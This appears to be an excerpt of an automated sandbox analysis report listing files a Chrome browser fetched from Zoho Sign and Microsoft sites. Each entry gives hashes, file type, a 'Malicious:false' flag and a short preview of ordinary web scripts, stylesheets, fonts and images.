                                                      SHA-256:230539126D29FB220F48E81BB279C250BD83754BD21F9D4E496CD41A58A5EEFA
                                                      SHA-512:CFCBAD0D77F270E248AB4773BC2F3B886566438EA6468DCCFF4BA071E35850141E7951E18CE80EBD780B500B514AA5AEC00DAD09942CDB855142E63D19B1AFFC
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://static.zohocdn.com/sign/assets/deeplink-to-native-app.min.bc05ab6da09b6cfedb61d605aafc2443.js
                                                      Preview:var NativeAppLauncher=function(a){"use strict";function b(a,b){console.log(a+":"+JSON.stringify(b,null,4))}var c={},d={getAppUri:function(){return"#"},getAppLauncherEl:function(){if(!c.appLauncherElId)throw new Error("Settings does not have valid appLauncherElId");return a("#"+c.appLauncherElId)},getNotSupportedMessage:function(){if(!c.appLauncherElId)throw new Error("Settings does not have valid NotSupportedMessage");return c.notSupportedMessage},getCampaignValue:function(){return c.campaignCode},getAppStoreURI:function(){return"#"}},e=a.extend({},d,{getIntentURI:function(){return"intent://m/#Intent;scheme="+c.appUri+";package="+c.androidAppId+";end"},getAppUri:function(){return c.appUri},getAppStoreURI:function(){var a=this.getCampaignValue()?"&referrer=utm_source%3Dother%26utm_campaign%3D"+this.getCampaignValue():"";return"https://play.google.com/store/apps/details?id="+c.androidAppId+a}}),f=a.extend({},d,{getAppStoreURI:function(){return this.getCampaignValue()?s.appendQueryParamet
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):15
                                                      Entropy (8bit):3.189898095464287
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:39A19D0882684989864FA50BCED6A2D1
                                                      SHA1:5CED55DAC2E0427E9DC605CEC1FEDAB0949EB15E
                                                      SHA-256:8FBEDED073249C3611742297EE96A976A95EE113F33B9A422A5D3A7A2DEB63E5
                                                      SHA-512:E795CB7DE27B42948B7DDFF19F3B401A8F95753AC7D37D9B5F52D8DACD2AA43A2AD9EACEC29F77D28080E20C21C48B9FA88A733FAC108939FB2F0EB036C7AEEE
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://statics-marketingsites-wcus-ms-com.akamaized.net/statics/override.css?c=7
                                                      Preview:/* empty css */
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Web Open Font Format (Version 2), TrueType, length 236884, version 2.22937
                                                      Category:downloaded
                                                      Size (bytes):236884
                                                      Entropy (8bit):7.9985682069857535
                                                      Encrypted:true
                                                      SSDEEP:
                                                      MD5:25E6EEFF332BC13C25DFC9344A29565C
                                                      SHA1:511CF9F9F1D76001D8C5AC64A35AB86E8630E4D4
                                                      SHA-256:68F79D13436D5A4203BC338B9EF4B22AA4D53505B160AE5C1F88B9AD5B9BB7F5
                                                      SHA-512:8D0B088569F13D0501B8E464D0F66D48FF6C577D696DC6B992D66463C546B737027781855F28B3EAE5F8408FFA1E49A928162B860060512244A8788972071791
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://webfonts.zohowebstatic.com/dejavusansbold/font.woff2
                                                      Preview:wOF2.......T..............Y.....................?FFTM...6...J..X.V..*..T..,.....$....6.$.......$.. ..5......'["..#..;)9S....*n..o..Az.V.../..[r](k.....1D'....j... 2.6P..bfR.9.....|.............................p..'a.Vh;v.....u^....w.Y....dl..........V....Xo..$-....wtv.#.w.F..[..t.......B..8..c[...$....0.....p.z..{.......l...GG..g0.......D..C...h.'..L.a..d&.,77..E.J-.p.f..o ..B..g..+.Tlsk{gw.x...."..+..8....h4..!.....+.."....=9%.{.=.g.1..+R.......rI.z.^...#.2+...7U..W.....I..*.]_E<.A..v..o.[.....n......9.{.t...g..!.....].Fe..{.p.u.O..@pS....{...u..2N.W.s.6.N..B.....=..p.j2..#.u.V.k..=....H.h...i........J..|.w.r.L...Jh..JF.9{7Y..+dL=S..w./.gO_......T_..A.I..B....I'..f.2(......,F...)Yj.[..(.3........K.AG.3z..S.W]J..ea..D}.............s.i..K.Y...I.q.d..+h.5.._2mb....G..sX8.'o,..=2.maq..+...h.w..na.#...!...^z...;z.!.......c$....o..1.`/?......r.xR..NF..c.OR.> .&.......V|.Ob/....QC....s_>.B'1.D..F.[..R.Yf.5.S......A.c.a........G.<F.....!.J.....~..
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text
                                                      Category:dropped
                                                      Size (bytes):20512
                                                      Entropy (8bit):5.1977444394360655
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:11C929B27F3D202A6EA190005CC20320
                                                      SHA1:AC6251C1E1673C5837233A50B1780B1FFFC2D8B0
                                                      SHA-256:9381BF6725E0315443DCC138382E7962EE1FBEC9074630386E5F9D16BC5F49D0
                                                      SHA-512:0231C7AE1377DC7EC908D2FF761311B9670A4E4FB5DD24E03157F960C620CD1444D1E5B6A4E3F192830197F3CB3B92C85C0F2AB3F871155DAB1D39F97A586698
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:var sign_id = GetURLParameter('sign_id');//No I18N.var formURL; .var ajax_failure = false;.var I18N = {};.var pii_page_initiated_timestamp;.var pii_submit_timestamp;.var kba_initiate_timestamp;.var kba_unique_id;.var questions = [];.var answers = [];.var timer;.var idleTimeOutFunc;.var is_challenge_round = false;..function initKbaProcedures().{. pii_page_initiated_timestamp = Date.now();. $('#application-loader').hide();. $('.guest-dash-wrapper').css("display", "block");. $('.intermediate-content').css('display', '');// No I18N. $('.kba-wrapper').show(); . $('#kba-continue').text(I18N.getMsg('js.authencation_mode.eueid.proceed')); // No I18N. $('#kba-continue').click(initiateKbaSession);//No I18N.}.function initiateKbaSession().{. replaceI18nValues();. $.ajax({. url: '/api/v1/guest/actions/'+action_id+'/kba/initiatesession?sign_id='+sign_id, // No I18N. type: 'POST', // No I18N. data: [],. dataType: 'json', // No I18N. async: true,. success: function (data,
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (65141)
                                                      Category:downloaded
                                                      Size (bytes):1386784
                                                      Entropy (8bit):5.714104384636349
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:61A872F2A48EB3E5007B3BE43C5080D8
                                                      SHA1:22A260909284428974E19A803CD91260860C5CFF
                                                      SHA-256:C251D0C3A5F54617A290F2526130E7C6DB69B5195603F6E709598EB44CCCAA99
                                                      SHA-512:CDA03E6F0DB54025974D83115E7A596DDEB49F5303772C1E8B5BE2FD8BE5DF3B2E13BF139592DC56EF0399488D554A805E03685CF165E8E928A2E818CC8B1CD6
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://cdn.jsdelivr.net/npm/@eid-easy/eideasy-widget@2.123.0/dist/full/eideasy-widget.umd.min.js
                                                      Preview:(function(t,e){"object"===typeof exports&&"object"===typeof module?module.exports=e():"function"===typeof define&&define.amd?define([],e):"object"===typeof exports?exports["eideasy-widget"]=e():t["eideasy-widget"]=e()})("undefined"!==typeof self?self:this,(function(){return function(){var t={5875:function(t,e,n){./*! For license information please see eideasy-browser-client.js.LICENSE.txt */.!function(e,n){t.exports=n()}(self,(function(){return function(){var t,e,a={8552:function(t,e,n){var a=n(852)(n(5639),"DataView");t.exports=a},1989:function(t,e,n){var a=n(1789),r=n(401),i=n(7667),s=n(1327),o=n(1866);function l(t){var e=-1,n=null==t?0:t.length;for(this.clear();++e<n;){var a=t[e];this.set(a[0],a[1])}}l.prototype.clear=a,l.prototype.delete=r,l.prototype.get=i,l.prototype.has=s,l.prototype.set=o,t.exports=l},8407:function(t,e,n){var a=n(7040),r=n(4125),i=n(2117),s=n(7518),o=n(4705);function l(t){var e=-1,n=null==t?0:t.length;for(this.clear();++e<n;){var a=t[e];this.set(a[0],a[1])}}l.p
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 216 x 46, 8-bit/color RGBA, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):4054
                                                      Entropy (8bit):7.797012573497454
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:9F14C20150A003D7CE4DE57C298F0FBA
                                                      SHA1:DAA53CF17CC45878A1B153F3C3BF47DC9669D78F
                                                      SHA-256:112FEC798B78AA02E102A724B5CB1990C0F909BC1D8B7B1FA256EAB41BBC0960
                                                      SHA-512:D4F6E49C854E15FE48D6A1F1A03FDA93218AB8FCDB2C443668E7DF478830831ACC2B41DAEFC25ED38FCC8D96C4401377374FED35C36A5017A11E63C8DAE5C487
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE1Mu3b?ver=5c31
                                                      Preview:.PNG........IHDR.............J.......tEXtSoftware.Adobe ImageReadyq.e<...(iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c132 79.159284, 2016/04/19-13:13:40 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:A00BC639840A11E68CBEB97C2156C7FD" xmpMM:InstanceID="xmp.iid:A00BC638840A11E68CBEB97C2156C7FD" xmp:CreatorTool="Adobe Photoshop CC 2015.5 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:A2C931A470A111E6AEDFA14578553B7B" stRef:documentID="xmp.did:A2C931A570A111E6AEDFA14578553B7B"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.......DIDATx..\..UU.>.7..3....h.L..& j2...h.@..".........`U.......R"..Dq.&.BJR 1.4`$.200...l........wg.y.[k/
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (41651)
                                                      Category:downloaded
                                                      Size (bytes):131537
                                                      Entropy (8bit):5.2237799798561975
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:30B7C335C62E5269E2D35B8E8B9F44B4
                                                      SHA1:C6D92B1516EB8F6D44AAF171FB24A1B2AADD0C4C
                                                      SHA-256:10733A5D876108F81C5F78EEE5C9760A739D89C52FA6180C4290B7F909F24346
                                                      SHA-512:5BCE247C84C88F993A857CE2F1E8540C648672DEB6D92A55BC808C33394B784C52866D635BEC8B7CD5E62A7EA4109569AC8BCD1381571B84592ACD6C5901D7A8
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://www.microsoft.com/onerfstatics/marketingsites-wcus-prod/shell/_scrf/js/themes=default/54-af9f9f/c0-247156/de-099401/e1-a50eee/e7-954872/d8-97d509/f0-251fe2/46-be1318/77-04a268/11-240c7b/63-077520/a4-34de62/1b-c96630/db-bc0148/dc-7e9864/78-4c7d22/e1-c35781/40-7b7803/cd-23d3b0/6d-1e7ed0/b7-cadaa7/ca-40b7b0/4e-ee3a55/3e-f5c39b/c3-6454d7/f9-7592d3/92-10345d/79-499886/7e-cda2d3/db-f3b1fd/93-283c2d/e0-3c9860/91-97a04f/1f-100dea/33-abe4df/19-c0fae7?ver=2.0&iife=1
                                                      Preview:(function(){/**. * @license almond 0.3.3 Copyright jQuery Foundation and other contributors.. * Released under MIT license, http://github.com/requirejs/almond/LICENSE. */.var requirejs,require,define,__extends;(function(n){function r(n,t){return w.call(n,t)}function s(n,t){var o,s,f,e,h,p,c,b,r,l,w,k,u=t&&t.split("/"),a=i.map,y=a&&a["*"]||{};if(n){for(n=n.split("/"),h=n.length-1,i.nodeIdCompat&&v.test(n[h])&&(n[h]=n[h].replace(v,"")),n[0].charAt(0)==="."&&u&&(k=u.slice(0,u.length-1),n=k.concat(n)),r=0;r<n.length;r++)if(w=n[r],w===".")n.splice(r,1),r-=1;else if(w==="..")if(r===0||r===1&&n[2]===".."||n[r-1]==="..")continue;else r>0&&(n.splice(r-1,2),r-=2);n=n.join("/")}if((u||y)&&a){for(o=n.split("/"),r=o.length;r>0;r-=1){if(s=o.slice(0,r).join("/"),u)for(l=u.length;l>0;l-=1)if(f=a[u.slice(0,l).join("/")],f&&(f=f[s],f)){e=f;p=r;break}if(e)break;!c&&y&&y[s]&&(c=y[s],b=r)}!e&&c&&(e=c,p=b);e&&(o.splice(0,p,e),n=o.join("/"))}return n}function y(t,i){return function(){var r=b.call(arguments,0
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text
                                                      Category:dropped
                                                      Size (bytes):9240
                                                      Entropy (8bit):5.130187048482665
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:C021544111C8CFBE94F8DEA899041A90
                                                      SHA1:6C3D495CBEA42F4EF616B2F5022DB2FBDAF7BB13
                                                      SHA-256:DDA309DAEDFE39E665A48CEDB23955AA9AF4E794D863B5E69AEF1B9C2A7C2C1F
                                                      SHA-512:BCC7A544B749A3A062AFFFCB0F0353A8523228D6BABA188245044A6E86E10CAE3D24B92A6A534D7C2257FD4E65050D9D6DFE8C5C808DA68D4DF044107895DD09
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:var reauth;.const ERROR_CODES = Object.freeze({. INVALID_VERIFICATION_CODE: 2002,. EXCEEDED_INVALID_ATTEMPTS: 2001,. LOW_SMS_CREDITS: 8025.});..function checkErrorsAfterOTPVerification(code). {. if( code === ERROR_CODES.INVALID_VERIFICATION_CODE ||. code === ERROR_CODES.EXCEEDED_INVALID_ATTEMPTS ||. code === ERROR_CODES.LOW_SMS_CREDITS ){. $('.sec-form-title').show();. }. if (code === ERROR_CODES.INVALID_VERIFICATION_CODE). {. $('.sec-form-title').text(I18N.getMsg('js.guest.attempts_limit'));//No I18N. $('.code-resend').hide();. }. else if(code != 13001). {. if (code === ERROR_CODES.EXCEEDED_INVALID_ATTEMPTS). {. $('.sec-form-title').text(I18N.getMsg('js.guest.attempts_exceeded'));//No I18N. }. else if(code === ERROR_CODES.LOW_SMS_CREDITS). {. $('.sec-form-title').text(I18N.getMsg("js.guest.unable_to_send_sms", [requestDetails.owner_email])); //No I18N. }. $('#otp-heading').hide();. $('
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Web Open Font Format (Version 2), TrueType, length 67468, version 2.8978
                                                      Category:downloaded
                                                      Size (bytes):67468
                                                      Entropy (8bit):7.996395549140606
                                                      Encrypted:true
                                                      SSDEEP:
                                                      MD5:42619423F97DB1B7DF843127F0D12534
                                                      SHA1:8B3D8F01DA182B06F7B176848DC27059C442EB9F
                                                      SHA-256:2C7B8A31A614AA1D0BB6F64B784A14DE742F95BAB2D4805E87E3E64D0EE1778E
                                                      SHA-512:7362C6CD5FE7086C8E184E947BE7A783AA0CC377565DCA40A61FEC208B828B53EA8003F8139905A9DA6A810F139F1B732505E411B3713B5B40CE327DD77EFB45
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://webfonts.zohowebstatic.com/robotobold/font.woff2
                                                      Preview:wOF2...............\...$..#.....................?FFTM..~...$..L.`....H..<........E.6.$..8..... ..}..f..)[....5....&.\.M....3..c.`.....j...Nf.B.`..7.=....,.0......e....]....EE..."1.$Y.`";L...:Nb...*. %.b.yVl..on...2c. L...2.B..8BD...zRrN..`....<..\9..<...uv-...I...U.....3/...HyH..T3...b...0)\y.e/.......cw.O...F..t4. .jt;5.).....&...T..X.)g.....>..>v.v.j....T....-..`..... .o>!....P.n..#......$....6;.....a)...:U.N..'...4}...u).X<..8.b.7}Ti..R...2s..}.N}.aUW.Cu.k.P.B.....Q.gl.lx).&~..K."%.E|..C...f0%..]...3...[..M.g.Bw../....m...dM.4....Dz.......}..4..pY..V k....n.....0.T.I.Z...t{..W,...b../.....y*."..;....bG9...q...z..cx...v.....^\.?.....?DF....48..h..l.$.8..'R.T....Q...-.)J.......BT....~n..a$.RCR....`.,.U....m..T*f.}e.?E....?..?,...a...$..F.....T.{7.aUl...R^.A.h......`.@i.t.....d.......;'...._....).h.`.^S.b........nH.N....$......=.br:.I?..?.Hx".H...R......*#..: \......._{v.... v.P........=......]..@..1E=Gi..^..98....~.M.... XHWS..m.#...cL..
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Web Open Font Format, CFF, length 16980, version 1.0
                                                      Category:downloaded
                                                      Size (bytes):16980
                                                      Entropy (8bit):7.9724722889447035
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:774F6CF073CC7D6E63E742FB6135E80B
                                                      SHA1:C1053F26FBF2626B25347D034A144130E9827746
                                                      SHA-256:933C63DA0F8426729A606E7AE34271C7950AB6B6C34C40B1E1649ADF657387CE
                                                      SHA-512:C2DF1F00D212A32415FD8D749633180D57EA84E0E762D59357656DFFE5C547CB18F9639F5A17E56DF91231DC5DC3D2D8C2F60AEC8F9D94B386DD23D70ED611C5
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://static.zohocdn.com/sign/fonts/fonts/zs-font.774f6cf073cc7d6e63e742fb6135e80b.woff
                                                      Preview:wOFFOTTO..BT......R.........................CFF ......=...L..h..FFTM..>.........|.-.GDEF..>........ ....OS/2..>....M...`Q.Ntcmap..?0...=...(Ig .head..@p.......6....hhea..@.... ...$.3..hmtx..@.............maxp..AX.........lP.name..A`.........<\.post..BD....... ....x........<...1...67.H.`..6.....@0..W<....w.h.ZZ.E..j...F3.}..=..............%NBn.H.)...wZ......_..U]uj.S..Nu.8JJKK....:.:.:.....47u,...1..Qr{!2. .-.K.z...3..S.*+......O..JO!]H3..f......2M_.....{.y%.v1...%..,*Y\rE.M%.,..de.J.-y........../.%zI.d.d.dO.%.K.[r...%.W.AI..?........q..F.....9.8...>G.!9TG.q.....C...o;..x.....Y...u./......|~...\4..9..yh..9.sZ........I......g.9O.99..9...9o......hn..ys....._.{...so..j...........eM...+...;*:.;.*.UW..lih..j..h...RU.......V..RQUUQ.X.TU.mksE[1rEKuSg{u.........v....eWmkn..j..l.n.J.[;..;.]U...u.u..-m.]u...].UW.]...V...[.X..^Q[]....\...v.*+...hdu[G]M]%.VW.2T.w.XM]C.2.....iYsgGoss....\..;zZ...+..>S.......A.............e..5....>.....m.mPi.bO6
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:HTML document, ASCII text, with very long lines (303)
                                                      Category:downloaded
                                                      Size (bytes):2766
                                                      Entropy (8bit):5.379930758970341
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:21FB8F897BC4006A13FD534533C86765
                                                      SHA1:FDDBE154FA215A257DAB6A8CF971855AE80D4BB0
                                                      SHA-256:D1033FA6AF6C3DD5532E4ED6E82678D175E24D614DE80FB8E034AC86506F187B
                                                      SHA-512:01A3F3A91B1F75E8AF80A86BDD884B188814CA4DF2927DCFC3E57E0A7B19AD7AB528AAD0F1F885693EF3B63D989BD7A638CFC23E3980D79367DC4FFBA95CA056
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://sign.zoho.eu/images/white.png
                                                      Preview:.<html ><head><link rel="stylesheet" href="https://static.zohocdn.com/sign/assets/vendor.169a8e414b24f4a6480e50696c4ffaff.css">.<link rel="stylesheet" id="style" type="text/css" href="https://static.zohocdn.com/sign/assets/style.f254cd172715959c35600c907b37af59.css">.<link rel="stylesheet" href="https://static.zohocdn.com/sign/fonts/font-styles.ec7bd066b09e33723d05755f854193be.css"><link rel="SHORTCUT ICON" href="https://static.zohocdn.com/sign/images/favicon.0846a82d826c9b9110a4b74674376afc.ico"><title>Zoho Sign</title><style>.#close-account{.text-decoration: underline;.position: relative;.cursor: pointer;.}.</style></head><body class="z-sign main-content"><script type="text/javascript" src="https://static.zohocdn.com/sign/assets/vendor.91adcec1eab45c3679c369daf3bdf67f.js" crossorigin="anonymous"></script><script type="text/javascript">var allow_close = 'false' === "true";.function loadCallback(){.if(allow_close).{.jQuery("#close-account").show();//No I18N.}.}.function getCSRFCookie()
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Web Open Font Format (Version 2), TrueType, length 73012, version 2.8978
                                                      Category:downloaded
                                                      Size (bytes):73012
                                                      Entropy (8bit):7.997054746325916
                                                      Encrypted:true
                                                      SSDEEP:
                                                      MD5:B2524744CE8CB43A92C3F5B03DB64386
                                                      SHA1:F2634748D26EE3303C8264E3C0E19C8D12B02050
                                                      SHA-256:BFA283EC707F1C7ADC71C8572F018DD4D4DA0AB1310DEFB9ACC866F968A79020
                                                      SHA-512:29A4875DE78EE4F207F14A154515EE98D0404DF359A9F91E65F8D14CC1005C669C9052AB885C4B7BF3A158BDCCCBE1F2515EBB3F112DD1C8CDDEBF75D7E489C1
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://webfonts.zohowebstatic.com/robotoitalic/font.woff2
                                                      Preview:wOF2.......4.............#.....................?FFTM..~...L..L.`....R..<........Y.6.$..8..... .....f..D[....5....L.U...*......+.5|..\+[.W.U .. .td.?..HZ...L.......E.......@.O.~../..Y.[t.H.rx.n..'....;....X....q..n.D._..,..i^Q..C..X...H.e".b...fF.W....*.{B...1......>........'.\....\{o...7a.....G.H...}H..}....15..^]`R.......Z.w.V<..f......w.h...P.R.j..>.k....N...:....Xw..:P5.....*>..j.x...@.....5....A.V..........=.j.o#.]|..y..kZ..'n..E.k..pF...rB.u.].EV........,\..*.i...3..ey.8.&..R..!....x.~y>...~UM.t8+.H+#.1.!C.1u........s....._$5hII...%....].)i...."b.Y}..ywf.LU....1{..y....K6b..^.....T..F....0..0../0.H....5D.hJ........&.6..,...F.1gls.[.v...$......6..E.....Q....VY.m7..~9@s.n..16......H..G.D..rT..vC$....WT.|..t*.N^d( +......ki......6L...TH...T%<l.z.qo.O..I_..L...uk..:.....X...0.`9...:....h.y......=.fQB....X.....4g..B..........A..2...1W8.k...".. ......l!...I.~4d.'.l........v....g.,.V.nx...A,".jZ.X(@......m..$.]...).g>.u.7.h...n.2.>{t..).F.Q...
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (320)
                                                      Category:downloaded
                                                      Size (bytes):27483
                                                      Entropy (8bit):4.434192083442731
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:B87CC62956D08864C4C24729D88E2544
                                                      SHA1:6E97FFA198003D3CAF71B140CA312DDB2C2FA669
                                                      SHA-256:974476D5A011B3CD9FBB1F1DE0E446AFEC2C09390EEECACCE5F6FA927F4DE734
                                                      SHA-512:42E5CE8243213C4AF333CDFB69C50D973859CC8BC9A26A0806557553DF0E2294B3E7B40BEA4C017C9022A9BBEB752B8AA6F258F615D49F4A9A16CEF833E1084C
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://static.zohocdn.com/sign/assets/style-max-767.b87cc62956d08864c4c24729d88e2544.css
                                                      Preview:@media all and (min-width: 240px) and (max-width:1035px) {. .modal. {. overflow-y: auto !important;. }. .ajax-success-msg, .ajax-failure-msg{. width: 100%;. }. .ajax-success-msg .msg-body,. .ajax-failure-msg .msg-body. {. max-width: calc(100% - 10px);. }. /*****guest home page ***/. .cont-center. {. width: 100%;. }. .cont-center .hintbox. {. margin-left: 0;. }. .top-term-cond p. {. overflow: hidden;.. width: calc(100% - 130px);.. text-overflow: ellipsis;. }. .guest-header-title. {. height: 90px;. }. .guest-header-img. {. font-size: 20px;. line-height: 56px;.. top: 20px;. left: 20px;.. width: 50px;. height: 50px;. }. .guest-header-name. {. font-size: 16px;. line-height: 90px;.. left: 90px;.. width: calc(100% - 90px);. height: 90px;. }. .guest-header-container {.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:SVG Scalable Vector Graphics image
                                                      Category:dropped
                                                      Size (bytes):2720
                                                      Entropy (8bit):4.9719781640962495
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:086CCB9B468BCF15D1AE23BF798FC7DA
                                                      SHA1:6A7CF935709F92CC1703E9403D116F4F5DCFEF77
                                                      SHA-256:75D84F079A39C801DDC35FF7C9D22ECD1FD032702DAD82271607A56B3A890902
                                                      SHA-512:D5ECF0E19232A8C3E04080BCAE704357C85B54A6A654E85952274ED86461DA5F689AA1A7CA0AFEE76D5F7DF8B9642D98F74E916B81F7349EB7CAF188390F6C31
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 128.13 125.41"><defs><style>.cls-1{fill:none;stroke:#666;stroke-miterlimit:10;stroke-width:0.75px;stroke-dasharray:4.49 2.25;}.cls-2{fill:#666;}.cls-3{fill:#50d2b7;}.cls-4{fill:#e66050;}</style></defs><title>bulk</title><polyline class="cls-1" points="105.29 52.41 105.29 125.03 31.92 125.03 31.92 29.2 82.08 29.2"/><rect class="cls-2" x="43.15" y="70.38" width="50.91" height="0.75"/><rect class="cls-2" x="43.15" y="80.11" width="50.91" height="0.75"/><rect class="cls-2" x="43.15" y="89.85" width="50.91" height="0.75"/><rect class="cls-2" x="43.15" y="99.58" width="28.45" height="0.75"/><polyline class="cls-3" points="105.29 52.41 82.08 52.41 82.08 29.2"/><path class="cls-4" d="M132.32,49.61V48.43H135V45.49h1.3v2.94H139v1.18h-2.68v3H135v-3Z" transform="translate(-10.87 -12.98)"/><path class="cls-3" d="M73.17,26.4V25.22h2.7V22.28h1.3v2.94h2.68V26.4H77.17v3h-1.3v-3Z" transform="translate(-10.87 -12.98)"/>
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (32000)
                                                      Category:dropped
                                                      Size (bytes):4270937
                                                      Entropy (8bit):5.322020585163583
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:217DBBB0ED57906BA32EDDBD659C900C
                                                      SHA1:51137B80B7B677F8CF803AB3D8E25A0BD34ECFE1
                                                      SHA-256:170060C1EB3AEFD14D3D70CE807FE2FEEE23F2A13F670FCAE6C819A711F0F554
                                                      SHA-512:E408F80DCDF10A3EC70159F342B34DCE1CC58C30DF1B7DB19E57BEEA5EA3219E5FD62A3F913AB94E9D5AF4CBF3E7732C24985BDD88378FAEB0694A34457B6A57
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:"use strict";define("embercli/app",["exports","ember","embercli/resolver","ember-load-initializers","embercli/config/environment"],function(e,t,n,i,s){var a=void 0;t.default.MODEL_FACTORY_INJECTIONS=!1,a=t.default.Application.extend({customEvents:{paste:"pasteEventListner"},modulePrefix:s.default.modulePrefix,podModulePrefix:s.default.podModulePrefix,Resolver:n.default}),(0,i.default)(a,s.default.modulePrefix),e.default=a}),define("embercli/components/activity-history-modal",["exports","ember","embercli/models/zs_jqgrid","embercli/mixins/common/security_regex","embercli/mixins/common/perfectScrollbar","embercli/utils/i18n","embercli/helpers/recent-activity-status-name"],function(e,t,n,i,s,a,l){var o=a.default.create(),r=n.default.create({}),d=t.default.Component;e.default=d.extend(i.default,s.default,{grid_id:"activity-history",org_id:parseInt(zsoid),didInsertElement:function(){var e=this;e._super.apply(e,arguments),e.loadData()},loadData:function(){var e=this,t=e.get("request_id"),n=e
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Web Open Font Format (Version 2), TrueType, length 42268, version 1.6750
                                                      Category:downloaded
                                                      Size (bytes):42268
                                                      Entropy (8bit):7.993298722560311
                                                      Encrypted:true
                                                      SSDEEP:
                                                      MD5:8B60FB8701419DD7C26055BC921D0228
                                                      SHA1:F5FEA48D682093AF5D58CD16A37973D004E5205A
                                                      SHA-256:5DAA00D6CC91BBC534DBC7CA905E1FABBB0BF47C6E34AA5266C68B5ECE94A875
                                                      SHA-512:FCC1E01FDDA99734EE0B9D8A65A37AD16FF2E134D156380E70F1528A95B3546753D6C9F28B067D95BA5454D3AD9038A8AB6A9531A95C3DC838D208A776109A4D
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://webfonts.zohowebstatic.com/texgyrecursorregular/font.woff2
                                                      Preview:wOF2.......................^....................?FFTM..f..N..X.`..f.....L..p.6.$.....t.. ..b..|[.p.I....d...t....D.}$.c{..5.9....>.....sq....ZV..........$.!.....B...N..........:Ym`.m.7...p../.:.$M...r.-.`L7%.....*fr...Vs...*.S?&..r....{...F.:Q^.......p.6.|..A..W...8+).g.np..X..f.oEw.SevbbbA.N...S9>;Se....m..d...B]Z.YE5.*..J.x..n...Z....8..j)...8(...J...a<..7d...\.H..Ev....O.@{D.p.U.gE5U%....p.|.1.Ke8].......)/a.w..-..t^..D^......i....OZ..d...g...d....?=0...2.}2.t-.'.....@..B."...........wfgC.2..%..vaa...a.t.cf.!$w!..;@....;.L.$.$$a.5D..%....A..Q..emu....V.V[k...........3.xf.g....X.C..+.y.q...Ah.l..w......h+0..G4......#..."..maga......N..[@0J.!5.w..1.. .Xk!q#.=..t.S...%...._'.$........l..... .L...wo.}c5../.. ...T......HH..S.....x.nfn.]z...R.....6d,g.eP@.F........+..L...{.f....Q....g3.:..(.h.{:m.......U....wO.I...b.........B..n.WB....!.".%...0.`..O.q~.T.-|<z3...'.XN...1i....m/.......~f`sE....V..X...$..`D...x...>z.g..Y6%}i%..M+..hF..j....
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (32089)
                                                      Category:downloaded
                                                      Size (bytes):92629
                                                      Entropy (8bit):5.303443527492463
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:397754BA49E9E0CF4E7C190DA78DDA05
